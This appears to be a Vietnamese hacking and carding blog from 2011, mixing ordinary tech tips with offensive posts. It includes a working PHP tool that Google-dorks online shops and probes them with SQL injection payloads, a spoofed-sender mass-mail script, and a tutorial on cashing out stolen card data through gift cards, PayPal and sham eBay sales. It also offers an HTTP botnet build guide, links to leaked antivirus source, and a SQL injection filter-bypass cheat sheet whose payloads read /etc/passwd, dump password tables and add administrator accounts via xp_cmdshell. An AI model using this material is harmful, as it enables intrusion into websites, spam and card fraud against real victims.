Thứ Ba, 15 tháng 3, 2011

tool search shop by hoangduye

code check sock trước

Code:
<title>check sock</title>
<form action="" method="POST">
<textarea name="sock" cols="50" rows="20"></textarea>
<input type="submit" value="check" name="submit1" />
</form><br>
<?php
    @set_time_limit(0);
    function get_sock($info)
    {
        preg_match("/[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?:[0-9]?[0-9]?[0-9]?[0-9]?[0-9]?/",$info,$return);
        return $return[0];
    }

    function get_page($url,$proxy)
    {
        $ch=curl_init();
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_PROXY,$proxy);
        curl_setopt($ch,CURLOPT_PROXYTYPE,CURLPROXY_SOCKS5);
        curl_setopt($ch,CURLOPT_HTTPPROXYTUNNEL,1);
        curl_setopt($ch,CURLOPT_COOKIEFILE,"C:\xampp\htdocs\check\cookie.txt");
        curl_setopt($ch,CURLOPT_COOKIEJAR,"C:\xampp\htdocs\check\cookie.txt");
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_TIMEOUT,5);
        $page=curl_exec($ch);
        curl_close($ch);
        return $page;
    }
    if(isset($_POST["sock"]))
    {
        $sock=explode("\n",$_POST["sock"]);
        $i=0;
        $arrSock = array();
        while($sock[$i]!="")
        {
            $sock[$i]=get_sock(trim($sock[$i]));
            $page=get_page("http://www.google.com.vn/search?q=allinurl:admin.asp?id=",$sock[$i]);
            if($page!="" && strpos($page,"302 Moved")==false)
            {
                echo "<font color='green'>".$sock[$i]."</font><br>";ob_flush();flush();
                array_push($arrSock,$sock[$i]);
            }
            else
            {
                echo "<font color='red'>".$sock[$i]."</font><br>";ob_flush();flush();
            }
            $i++;
        }
        echo "====List sock ok====<br>";
        $x = join("\r\n",$arrSock);
        echo "<textarea rows='10' cols = '20'>".$x."</textarea>";
    }
?>
tool check shop
Code:
<title>ShopFinder v1.0</title>
<form action="" method="POST">
<table>
    <tr><td>List keywords</td><td>List socks</td></tr>
    <tr><td><textarea name="keyword" cols=40 rows=15>google nha'</textarea></td><td><textarea name="sock" cols=40 rows=15>sock nha'</textarea></td></tr>
    <tr><td></td><td><input type="submit" value="start" /></td></tr>
</table>
</form>
<?php

    ######################
    # cac' ham` ho~ tro. #
    ######################
    function getPage($url,$proxy)
    {
        $ch=curl_init();
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

        //sock5
        if($proxy)
        {
            curl_setopt($ch,CURLOPT_PROXY,$proxy);
            curl_setopt($ch,CURLOPT_PROXYTYPE,CURLPROXY_SOCKS5);
            curl_setopt($ch,CURLOPT_HTTPPROXYTUNNEL,1);
        }

        //user-agent
        $agent = "Mozilla/5.0 (Windows; ?; Windows NT 5.1; *rv:*) Gecko/* Firefox/0.9*";
        curl_setopt($ch,CURLOPT_USERAGENT,$agent);

        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_TIMEOUT,10);
        $page=curl_exec($ch);
        curl_close($ch);
        return $page;
    }
    function getDomain($url)
    {
        $domain = str_replace("http://","",$url);
        $domain = str_replace("www.","",$domain);
        $domain = str_replace(strstr($domain,"/"),"",$domain);
        return $domain;
    }
    function notInStr($arrFilterKeyword,$str)
    {
        foreach($arrFilterKeyword as $filterKeyword)
        {
            if(strpos($str,$filterKeyword))
            {
                return false;
            }
        }
        return true;
    }
    function cleanUpPage($page)
    {
        $ret = htmlentities($page);
        $ret = str_replace("=","vndarkcode",$ret);

        $arr = array("/[\s]/","/http/","/\"/");
        $ret = preg_replace($arr,"",$ret);

        return $ret;
    }
    function filter($link,$rankAlexa,$arrSearch)
    {
        $page=getPage("http://www.alexa.com/search?q=".getDomain($link)."&r=home_home&p=bigtop","");
        $page=str_replace("\n","",$page);
        preg_match("/Alexa[\s]Traffic[\s]Rank:(.*?)\/a\>/",$page,$tmp);
        preg_match("/\"\>(.*)\</",$tmp[1],$result);
        //echo (intval(str_replace(",","",$result[1])));ob_flush();flush();
        if(intval(str_replace(",","",$result[1])) > $rankAlexa || !preg_match("/\d/",str_replace(",","",$result[1])))
            return 0;
        

        $page = htmlentities(getPage($link,""));
        //echo $page;ob_flush();flush();
        if(notInStr($arrSearch,$page))
            return 0;

        return 1;

    }


    #######################
    # cac' ham` thuc. thi #
    #######################
    function getLinksFromGoogle($keyword,$arrFilterKeyword,$arrDomainChecked,$arrSock)
    {
        $sockUsing = array_pop($arrSock);
        $limit = 200000;
        $arrGoogle = array(
            "google.com",
            "google.ca",
            "google.com.au",
            "google.co.uk",
            "google.fr",
            "google.ch",
            "google.com.vn",
            "google.nl",
            "google.es",
            "google.ie",
            "google.de",
            "google.co.jp"
        );
        
        $arrLink = array();

        foreach($arrGoogle as $google)
        {
            $h = 0;
            while($h < $limit +1)
            {
                $urlGoogle = "http://www.".$google."/search?&q=".$keyword."&start=".$h."&num=100&filter=1&tbs=cpk:1";
                //echo $urlGoogle."<br>";ob_flush();flush();
                $pageGoogle = getPage($urlGoogle,$sockUsing);
                
                if($pageGoogle == "")
                {
                    if($sockUsing = array_pop($arrSock))
                    {
                        $h = $h - 100;
                    }
                    else
                    {
                        exit("nap. them^ sock di");
                    }
                }
                if(strpos($pageGoogle,"did not match any documents")==true)
                {
                    break;
                }
                if(strpos($pageGoogle,"http://www.".$google."/support/websearch/bin/answer.py?answer=86640")==true || strpos($pageGoogle,"302 Moved")==true)
                {
                    if($sockUsing = array_pop($arrSock))
                    {
                        $h = $h - 100;
                    }
                    else
                    {
                        exit("nap. them^ sock di");
                    }
                }

                preg_match_all("/href=[\"]http:\/\/(.*?)\"/",$pageGoogle,$line);
                $i=0;
                while($line[1][$i]!="")
                {
                    if(notInStr($arrFilterKeyword,$line[1][$i]) && !in_array(getDomain($line[1][$i]),$arrDomainChecked) && (preg_match("/\?/",$line[1][$i]) || preg_match("/\/(\d+)\//",$line[1][$i])))
                    {
                        array_push($arrLink,"http://".$line[1][$i]);
                        array_push($arrDomainChecked,getDomain($line[1][$i]));
                    }
                    $i++;
                }
                if((!strpos($pageGoogle,"start=".($h+100))))
                {
                    break;
                }
                $h += 100;
            }
        }
        array_push($arrSock,$sockUsing);
        return $arrLink;
    }

    function check_sql_injection($url)
    {
        if(preg_match("/\?/",$url))
        {
            $pos[0]=strpos($url,"&");$i=1;
            while($pos[$i]=strpos($url,"&",$pos[$i-1]+1))
            {
                $i=$i+1;
            }
            $array_url[0]=stripslashes($url."'");$i=1;
            while(!$pos[$i-1]=="")
            {
                $temp2=substr($url,$pos[$i-1]);
                $temp1=substr_replace($url,"'",$pos[$i-1]);
                $array_url[$i]=stripslashes($temp1.$temp2);
                $i=$i+1;
            }
        }
        elseif(preg_match("/\/(\d+)\//",$url))
        {
            $array_url[0]=stripslashes($url."'");
            preg_match_all("/\/(\d+)\//",$url,$result);
            foreach($result[1] as $var)
                array_push($array_url,stripslashes(str_replace($var,$var."'",$url)));
        }

        $i=0;
        while(!$array_url[$i]=="")
        {
            //echo $array_url[$i]."<br>";ob_flush();flush();
            $page = strtolower(cleanUpPage(getPage($array_url[$i],"")));


            if(strpos($page,"sql"))
            {
                return $array_url[$i];
            }
            else
            {
                if($page != strtolower(cleanUpPage(getPage(str_replace("'","",$array_url[$i]),""))))
                {
                    //echo 1;ob_flush();flush();
                    $arrCheck = array(
                    array("%20And%201=0--","%20And%201=1--","%20And%202=2--"),
                    array("%20'%20And%201=0+--+","%20'%20And%201=1+--+","%20'%20And%202=2+--+"),
                    array("%20/*!%20And%201=0*/--","%20/*!%20And%201=1*/--","%20/*!%20And%202=2*/--"),
                    array("%20'/*!%20And%201=0*/+--+","%20'/*!%20And%201=1*/+--+","%20'/*!%20And%202=2*/+--+"));
                    foreach($arrCheck as $check)
                    {
                        $a = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[0],$array_url[$i]),"")));

                        $b = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[1],$array_url[$i]),"")));

                        $c = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[2],$array_url[$i]),"")));
                        
                        $d = 0;
                        for($k=0;$k<=count($a);$k++)
                        {
                            if(($a[$k] != $b[$k]) && ($b[$k] == $c[$k]))
                                $d++;
                        }


                        if($d > 10)
                        {
                            return $array_url[$i];
                        }
                    }
                }
            }

            $i=$i+1;
        }
        return 0;
    }

    function scanDetail($url,$fileType,$arrSock)
    {
        $sockUsing = array_pop($arrSock);
        $keyword="site:".getDomain($url)."+filetype:".$fileType;
        $blackList = array();
        $end=1;
        while($end<=10)
        {
            $urlGoogle="http://www.google.com/search?q=".$keyword."&start=0&num=100";
            $pageGoogle=getPage($urlGoogle,$sockUsing);
            if($pageGoogle == "")
            {
                if($pageGoogle == "")
                {
                    if($sockUsing = array_pop($arrSock))
                    {
                        $end = $end - 1;
                    }
                    else
                    {
                        exit("nap. them^ sock di");
                    }
                }
            }
            if(strpos($pageGoogle,"did not match any documents")==true)
            {
                break ;
            }
            if(strpos($pageGoogle,"http://www.google.com/support/websearch/bin/answer.py?answer=86640")==true || strpos($pageGoogle,"302 Moved")==true)
            {
                if($sockUsing = array_pop($arrSock))
                {
                    $end = $end - 1;
                }
                else
                {
                    exit("nap. them^ sock di");
                }
            }
            preg_match_all("/href=\"http:\/\/(.*?)\"/",$pageGoogle,$line);
            $i=0;
            while($line[1][$i]!="")
            {
                if(!preg_match("/google.com|youtube.com|cache|alexa.com|search\?/",$line[1][$i]))
                {
                    if(!preg_match("/\?/",$line[1][$i]))
                    {
                        preg_match("/\/(.*?)\./",$line[1][$i],$file);
                        $keyword=$keyword."+-".$file[1].".".$filetype;
                    }
                    else
                    {
                        preg_match("/\/(.*?)\./",$line[1][$i],$file);
                        if(!in_array($file[1],$blackList))
                        {
                            $result = check_sql_injection("http://".$line[1][$i]);
                            if($result)
                            {
                                array_push($arrSock,$sockUsing);
                                return $result;
                            }
                            $keyword=$keyword."+-".$file[1].".".$fileType;
                            array_push($blackList,$file[1]);
                        }
                    }
                }
                $i=$i+1;
            }
            if((!strpos($pageGoogle,"start=".($h+100))))
            {
                break;
            }
            $end=$end+1;
        }
        array_push($arrSock,$sockUsing);
        return 0;
    }
    if(isset($_POST["keyword"]) && isset($_POST["sock"]))
    {

        set_time_limit(0);

        // chi? check shop co' so^' rank nho? hon* 5tr
        $rankAlexa = 5000000;

       // cac' keyword can` phai? co' trong page
        $arrSearch = array("price","cart","basket","$","add to");
        

        // trong link co' cac' tu` nay` se~ bi. loai. bo?
        $arrFilterKeyword = array("google","wikipedia.org","youtube.com","alexa.com","yahoo.com","javascript:void","cache","rapidshare.com","mysql.com","php.net","bing.com","msn.com","microsoft.com","union","torrent","live.com","microsofttranslator.com","amazon.com","facebook.com","info.com","Info.com","order+by","..","'","forum","forum.","hack","security","milw0rm.com","exploit","ebay.com","apple.com","blog",".xml","flickr.com",".pdf",".txt","\"",".vn","india",".in",".cn",".kr",".jp",".hk",".hu",".li",".ru","thailand","thai",".tw","taiwan");


        echo "<font color='red'><h3>[+]Shop finder v1.0 code by vndarkcode</h3></font>";ob_flush();flush();
        
        
        $arrSock = explode("\r\n",$_POST["sock"]);
        $arrDomainChecked = array();

        $arrKeyword = explode("\r\n",$_POST["keyword"]);
        
        
        foreach($arrKeyword as $keyword)
        {
            echo "<font color='green'>[+]Checking keyword : ".$keyword."</font><br>";ob_flush();flush();
            echo "&nbsp;&nbsp;<font color='brown'>[*]Geting links from google</font><br>";ob_flush();flush();
            
            $keyword = ltrim($keyword);
            $keyword = rtrim($keyword);
            $keyword = str_replace(" ","xxx",$keyword);
            $keyword = str_replace("+","xxx",$keyword);
            $keyword = urlencode($keyword);
            $keyword = str_replace("xxx","+",$keyword);

            $arrLink = getLinksFromGoogle($keyword,$arrFilterKeyword,$arrDomainChecked,$arrSock);
            
            echo "&nbsp;&nbsp;<font color='brown'>[*]Found ".count($arrLink)." shops</font><br>";ob_flush();flush();
            echo "&nbsp;&nbsp;<font color='brown'>[*]Finding bug shops</font><br>";ob_flush();flush();
            $i = 0;
            foreach($arrLink as $link)
            {
                if(filter($link,$rankAlexa,$arrSearch))
                {
                    $result = check_sql_injection($link);
                    if($result)
                    {
                        echo "&nbsp;&nbsp;<a href=\"".$result."\" target='_blank'>".$result."</a> => sql injection<br>";ob_flush();flush();$i++;
                    }
                    else
                    {
                        $result = scanDetail($link,"php",$arrSock);
                        if($result)
                        {
                            echo "&nbsp;&nbsp;<a href=\"".$result."\" target='_blank'>".$result."</a> => sql injection<br>";ob_flush();flush();$i++;
                        }
                    }
                }
            }

            echo "&nbsp;&nbsp;<font color='brown'>[*]Found ".$i."/".count($arrLink)." bugs shop</font><br>";ob_flush();flush();
            echo "&nbsp;&nbsp;<font color='brown'>[*]Done</font><br>";ob_flush();flush();
        }
    }

?>
anh em chú ý edit các chỗ màu đỏ nhé

CODE fake mail address

CODE fake mail address
VD: Fake mail abc@yahoo.com..... Fake mail theo ý thích của bạn.

Tạo file index.html

<HTML>

<HEAD>
<TITLE>..::Spam::..</TITLE>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
</HEAD>

<BODY>
<FORM ACTION="send.php" METHOD="POST">
Tên người gửi: <INPUT NAME="SenderName" TYPE="text" SIZE="35"> <P>
Email người gửi: <INPUT NAME="SenderEmail" TYPE="text" SIZE="35"> <P>
Email người nhận: <INPUT NAME="RecipientEmail" TYPE="text" SIZE="35"> <P>
Số thư muốn gửi : <INPUT NAME="Num" TYPE="text" SIZE="35"><P>
Tiêu đề email : <INPUT NAME="Subject" TYPE="text" SIZE="35"><P>
Nội dung email <BR><TEXTAREA NAME="Message" ROWS="5" COLS="40"></TEXTAREA><P>
<INPUT TYPE="Submit" VALUE="Send"> <INPUT TYPE="Reset">

</FORM>
</BODY>

</HTML>
Tạo send.php
<?
for ($i=1; $i< $Num + 3 ; $i++)
{

if ((!$SenderEmail) || (!$Message)) {
echo ("Ban chua nhap noi dung email !!");
exit ();
}

if (!eregi("^[_\.0-9a-z-]+@([0-9a-z][0-9a-z-]+\.)+[a-z]{2,3}$", $SenderEmail)) {
echo ("Dia chi email khong ton tai !");
exit ();
}

if (!$Subject)
$Subject = $DefaultSubject;

$Headers .= "From: $SenderName <$SenderEmail>\r\nReply-To: $SenderEmail";


mail ($RecipientEmail, $Subject, $Message, $Headers);


}
$j = $i - 3;
if ($RedirectPage) {
header ("Location: $RedirectPage");
} else {
echo '<CENTER><H1>Ban da gui email thanh cong '.$j.' mail !</H1>\n';
echo "</CENTER>";
}
?>
Chạy dược hay không là do host thôi

Tut cash paypal bằng giftcard

Nguyên liệu:
- Acc paypal VN
- Acc ebay có thể list hàng, có feed càng good.
- CCV
- Sock từa lưa
- SSH
- Bank US

Okay bắt đầu làm:
Vô Giftcards.com phang giftcard. Dùng visa, master, đủ tiền nó hiện lên thông báo "Thank you..." là qua. Mỗi card max 200$. Chờ khoảng 30'-1h vào email check là thấy giftcard. Giftcard của bọn này giống như thẻ ảo visa cũng có cc number, ccv. Quản lý được giao dịch. Bill address thì mình change thế nào cũng được. Ae dùng cái này bill=ship về drop thì ped 100% mỗi tội tại một vài shop lớn lại led ko hiểu vì sao.

Ship làm đéo gì mất công. Ae dùng ssh reg 1 con paypal us (personal là được roài). Info thằng Mỹ nào đó. Có drop thì để info drop luôn càng tốt. Change bill add + name trong giftcard theo info này. Add card vào paypal, có expuse để lift limit luôn Mua thêm cái bank us 6$ mà verify. Mỗi acc pp add bao nhiêu card cũng được nhưng tốt nhất chỉ nên add 3 cái thôi. Ok xong phần paypal.

Bây h` lên ebay list hàng, list khoảng 3 cái. 2 cái 199$, 1 cái tầm 159-169$. Paypal nhận tiền là paypal VN của mình.

Tiếp tục dùng ssh vào ebay create cái account. Info trùng info paypal US. Dùng cái này lên buy hàng của chính mình list lúc nãy. Lúc này thì tiền đã vào acc paypal của mình và ko bao h` bị limit. Nhưng chưa phải là xong. Trong acc paypal us vẫn còn dư khoảng 3, 4 chục $. Tìm món hàng thật nào đó trên ebay tầm giá ấy và buy.

Vài ngày sau thì thằng sell hàng thật sẽ báo shipped và send track cho mình. Mình vào ebay của mình và cũng báo shipped và add cái track đấy vào luôn (nhưng thực ra mình có ship cái gì đâu =)) ). Leave positive feedback cho nhau. Thế là bây h` mình đã sở hữu số tiền đó thành công. Tiền sạch 100% và ko bao h` bị đòi lại.

Vì sao phải cần cái track, vì sau này mình withdraw thì paypal kiểu gì nó cũng đòi chứng minh nguồn tiền đủ kiểu anh em chỉ cần show cho nó cái track bảo tao bán hàng trên ebay và đã ship hàng cho buyer rồi thì khi đó withraw thoải mái.

Nên add khoảng 3 card vì theo tui thấy mua được vài thứ là paypal us nó limit đòi confirm location. Khi đó thì dùng ssh + bank khác reg paypal add card vào chiến tiếp.

Hiện tại thì khó khăn chỉ là order cái giftcard, vài ngày trước thì mình phang qua rầm rầm, mỗi ccv ít nhất ăn được 2 cái. Nhưng đéo hiểu sao mấy hôm nay nó có thêm cái identity quiz khó chịu vl. Lúc ăn được lúc không. Có khi dùng sock từa lưa thì qua, có khi dùng sock chuẩn trùng city state lại bắt confirm identity. Ae nào làm theo cách của mình ko ăn được cũng xin đừng phán tut nát này nọ. Dù sao thì trong tut cũng có ít kinh nguyệt ebay mà đối với mình thì ebay là cái nơi ko bao h` nát.

Proof:


Chủ Nhật, 6 tháng 3, 2011

Mã nguồn Kaspersky Anti-Virus đã bị leak

Kaspersky.zip (password: ads or asd)


Mã nguồn của Kaspersky Anti-Virus hiện đang bị phát tán online trên internet thông qua các mạng torrent. 

Source code này đã bị đánh cắp từ đầu năm 2008. Theo thông tin trên các file source code, ngày thay đổi cuối cùng là tháng 12/2007. Như vậy có thể đây là mã nguồn của bộ Kaspersky's security suite 8.0 . Phiên bản hiện nay là 11.0 (năm 2011)

Mã nguồn này được viết bởi C++ và Delphi, bao gồm nhiều project khác nhau như: Anti virus engine, anti-phishing, anti-dialer, anti-spam ...


Hacker đã từng rao bán bộ source code này vào năm 2009.
Hiện Kaspersky chưa có bình luận gì về các thông tin trên.

Thứ Tư, 2 tháng 3, 2011

Gọi điện sang Mỹ Free

Chắc hẳn bạn sẽ rất ngạc nhiên vì làm sao mà có thể gọi điện miễn phí từ các nước sang Mỹ được?! Thông thường muốn gọi điện sang Mỹ bằng các dịch vụ viễn thông tại Việt Nam ( viettel, mobile, vinaghost....) thì cước cũng không phải là rẻ. Còn thực hiện các cuộc gọi quốc tế giá rẻ, dịch vụ có phí của Skype....thì cũng được. Nhưng miễn phí mà chất lượng tốt thì chỉ có ở WhistlePhone.



Bạn chỉ cần vào địa chỉ : http://whistlephone.com/whistles, sau đó tải phần mềm WhistlePhone,cài đặt và đăng ký một tài khoản miễn phí sau khi khởi động chương trình lần đầu tiên là bạn đã có ngay một số điện thoại do chương trình cung cấp. ( Số điện thoại này là số điện thoại bên Mỹ đó nhé).

Tiếp theo bạn nhập số người quen của bạn bên Mỹ và Alo "quên ngày tháng". ( Lưu ý là nhập số điện thoại bình thường, không cần thêm 001 như các cuộc gọi quốc tế từ VN sang US)



Lưu ý : 2 bang ở Mỹ không thực hiện được cuộc gọi miễn phí được đó là Hawaii và Alaska. Cái này đợi khi nào Whistle cập nhật hoặc giải thích. Nhưng với dịch vụ phải nói là có 1 không 2 thế này thì thật tuyệt để mọi người sử dụng rồi.
Nếu bạn muốn gọi sang nước khác thì whistle có tính phí ( xem bảng tính phí tại đây ), nhưng nhìn chung khá rẻ so với sử dụng dịch vụ gọi điện quốc tế của các nhà mạng ở VN. Mình đã thực hiện vài cuộc gọi cho người bạn ở Houston, chất lượng cuộc gọi phải nói là rất tốt, so với gọi từ Viettel sang đó thì whistlephone nhỉnh hơn.
Còn chờ gì nữa mà không sử dụng! Chúc các bạn sẽ tiết kiệm được thật nhiều chi phí khi gọi sang Mỹ. Và hãy cho ý kiến của mình khi sử dụng phần mềm nhé!

Thứ Hai, 28 tháng 2, 2011

Hướng dẫn cài đặt và sử dụng XP Mode trên Windows 7

Đầu tiên, các bạn download XP Mode và Vitual PC tại đây: Download XP Mode và Windows Virtual PC for Windows 7 từ Microsoft

1. Cài bản cập nhật XP Mode:
Bạn chạy file Windows6.1-KB958559-x86.msu (nếu bạn đang sử dụng Windows 7 x86) hoặc Windows6.1-KB958559-x64.msu(nếu bạn đang sử dụng Windows 7 x64) để bắt đầu cập nhật XP Mode cho Windows 7.





Click Yes để bắt đầu cài đặt


Click Accept để đồng ý cài đặt


Quá trình cài đặt XP Mode


Quá trình cài đặt hoàn tất, bạn hãy khởi động lại máy


Một nhóm mới xuất hiện trên Start Menu

2. Cài đặt Virtual Windows XP:

Để cài đặt Virtual Windows XP, bạn chạy file VirtualWindowsXP.msi


Click Next để bắt đầu cài đặt


Chọn vị trí để cài đặt Virtual Windows XP


Quá trình cài đặt 
Virtual Windows XP


Click Finish để hoàn thành quá trình cài đặt Virtual Windows XP


Tick vào ô I accept the license terms để đồng ý các điều khoản sử dụng


Điền vào password dùng để đăng nhập máy ảo


Chọn chế độ cập nhật cho máy ảo


Cấu hình Virtual Windows XP cho lần chạy đầu tiên


Điền mật khẩu để đăng nhập 
Virtual Windows XP
3. Một số hình ảnh về Virtual Windows XP:

Desktop của Virtual Windows XP


Đây là bản XP Sp3


Virtual Windows XP sử dụng IE 6.0

Windows Media Player 9


Truy cập mọi dữ liệu trên máy ảo như máy thật



Virtual Windows XP chỉ hiển thị được chế độ 16 bit màu
-----------------------------------------------------------------------------------------------------------


nếu muốn chuyển sang chế độ màu 32bit thì các bạn làm như sau .

Tools -> Settings -> Integration -> bỏ chọn Enable at startup. khởi động lại windows xp

hoặc trươc khi vào xp Mode thì bạn vào All programs -> Winodws virtual Pc -> virtual machines -> kích chuột phải vào virrtual Windows Xp -> chọn settings -> Integration -> bỏ chọn Enable at startup mở xp Mode lên và chỉnh về chế độ màu 32bit và độ phân giải của màn hình




Tăng RAM bạn làm như sau:

Vào Virtual Machines, chuột phải vào Virtual Windows XP > Setting > Close (cái dòng dưới cùng có dấu X ấy) > Automatically close with following action, chọn shutdown. Rùi. Mở Virtual windows XP ra, sau đó đóng lại, XP Mode sẽ shutdown (cHihứ không ở chế độ Hibernate nữa). Sau đó mở Virtual Machines, chỉnh lại RAM bình thuờng "Chỗ set của em sẽ không bị mờ mất tiu òi nữa).

Của mình đây:

Tổng hợp các công cụ hack cần cho Firefox

Full hack the addon in Firefox


HackBar 1.5.5


Mã:
https://addons.mozilla.org/en-US/firefox/addon/966
Cho phép bạn chỉnh sửa tiêu đề cũng như POST dữ liệu trong một cách dễ dàng để quản lý

Hackbar
Mã:
https://addons.mozilla.org/en-US/firefox/addon/3899
Cho phép bạn thay đổi URL trong một hộp lớn lớn, làm cho SQL tiêm dễ dàng hơn nhiều để xem và quản lý. Cập nhật cho đến FF3 ra vào tuần tới.

Poster
Tương tự như làm xáo trộn dữ liệu nhưng có một phương pháp tiên tiến hơn.

Cookie Watcher
Đồng hồ cookie từ thanh trạng thái

FireCookie
Các .. ở trên, nhưng như là một plugin firebug

Con đom đóm
Bạn phải có điều này nếu bạn đã bao giờ rối tung với các trang web. Dễ dàng cho phép bạn xem / chỉnh sửa mã nguồn HTML cũng như CSS và JS debuggin

ASNumber
Hiển thị IP informatoin và nhiều hơn nữa về trang web của bạn ghé thăm

Mẫu miễn phí
Trong trang soạn thảo hộp nhập liệu. Cho phép bạn chỉnh sửa ẩn đầu vào cũng như vô hiệu hóa.

HTTPFox
Indepth HTTP Analyzer

Tool scan sock free ( 7 tool)

Như đã hứa tớ share anh em tool scan sock. mấy cái này được bạn nó share.
anh em nào dùng thì thanks nhé.
tạm thời 1 post thanks nhiều pub lun

http://www.mediafire.com/?6g8obc73wv26eqx

Hướng dẫn sử dụng:


Trích:
Bước 1: down về và scan virus. Tớ được cho nên ko rõ nó thế nào đâu nhé. ANh em đừng trách tớ.
Bước 2: chạy phần mềm nào mà bạn thích. Hình như có 7 tool. mà dùng hết cũng được.
Nếu chạy được thì OK.
Bước 3: nếu không chạy được anh em thì file pack trong đó coppy vào ổ C://window/system32.
Do tớ chưa kiếm đủ file chạy nên ko chắc chạy đủ 7 tool. Tùy máy thôi.
Sẽ share thêm nhiều tool nữa. Có khoảng 20 tool cơ.
Chúc anh em vui vẻ
lưu ý: tớ chưa test hết anh em dùng rồi cho ý kiến nha

Botnet v3.0 (HTTP Botnet) Source Code



Panel Tutorial:
1). Create a new sql database using the name of your choice and import "botpanel.sql"
2). Modify the files: "includes\config.php" and "\sc_prefs.php"
Compile Builder Tutorial:
1). Compile "Socks5" and "Persistant" and place those files in "Original Stub\Stub\Stub\Resources"
2). Rename "Socks5" to "winsocks" and "Persistant" to "csrse"
3). Compile "Stub" and place it in "Builder\Builder\Resources"
4). Compile the Builder (To Build your bot go to Fertigstellung)
Source
Code:

Thứ Bảy, 26 tháng 2, 2011

Các kỹ thuật bypass SQL Injection Nâng Cao

Bypass PHP Magic Quotes

Ví dụ :

Code:
"SELECT name, surname FROM users WHERE
name='" . $_GET['name'] . "'"
Ta có thể by pass bằng back-end DBMS
Code:
SELECT name, surname FROM users WHERE
name='foobar\' OR 10>4--'
Exploit với câu lệnh Union
Code:
SELECT name, surname FROM users WHERE
name='foobar\' UNION ALL SELECT NAME,
PASSWORD FROM SYS.USER$--'
Boolean-based blind SQL injection exploit
Code:
SELECT name, surname FROM users WHERE
name='foobar\' OR ASCII(SUBSTR((SQL
query), Nth SQL query output char, 1))
> Bisection algorithm number--'
By pass qua lênh load_file
Code:
LOAD_FILE('/etc/passwd')
biến đổi như sau
Code:
LOAD_FILE(CHAR(47,101,116,99,47,112,97,
115,115,119,100))
hoặc
Code:
LOAD_FILE(0x2f6574632f706173737764)
Trong các web asp ta có thể dùng phương pháp back-end DBMS
vd:
Code:
SELECT pg_sleep(3)
thành 
Code:
S%ELEC%T %p%g_sle%ep(%3)
Bypass bằng phương pháp hex đối với MSSQL
vd:
Code:
exec master..xp_cmdshell 'NET USER myuser
mypass /ADD & NET LOCALGROUP
Administrators myuser /ADD'
thành
Code:
DECLARE @rand varchar(8000) SET @rand =
0x65786563206d61737465722e2e78705f636d6473
68656c6c20274e45542055534552206d7975736572
206d7970617373202f4144442026204e4554204c4f
43414c47524f55502041646d696e6973747261746f
7273206d7975736572202f41444427; EXEC
(@rand)
ByPass bằng các dấu comment trong mysql
vd :
Code:
SELECT user, password FROM mysql.user
thành
Code:
SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D
*/password/*r+anD*/FROM/*rAn,D*/mysq
l.user
Bypass by random URI encoded payload 
vd:đối với hệ quản trị PostgreSQL
Code:
SELECT schemaname FROM pg_tables
thành
Code:
%53E%4c%45%43T%20%73%63h%65%6d%61%6e
a%6de%20%46%52O%4d%20%70g%5f%74a%62%
6ce%73
Bypass với các câu select đơn
vd:
Code:
SELECT user, password FROM mysql.user
thành
Code:
SELECT GROUP_CONCAT(CONCAT(user, 'RaND',
password)) FROM mysql.user
hoặc sử dụng unhex(hex(trường cần lấy))
Code:
unhex(hex(username))

Bypass với các trường hợp column bị giới hạn


vd:đối với 
Code:
SELECT usename, passwd FROM pg_shadow
thành
Code:
UNION ALL SELECT,
CHR(109)||CHR(107)||CHR(100)||CHR(83)||CHR
(68)||CHR(111)||COALESCE(CAST(usename AS
CHARACTER(10000)),
CHR(32))||CHR(80)||CHR(121)||CHR(80)||CHR(
121)||CHR(66)||CHR(109)||COALESCE(CAST(pas
swd AS CHARACTER(10000)),
CHR(32))||CHR(104)||CHR(108)||CHR(74)||CHR
(103)||CHR(107)||CHR(90), FROM pg_shadow--
Chúc các bạn thành công.

 
Design by mkha.hero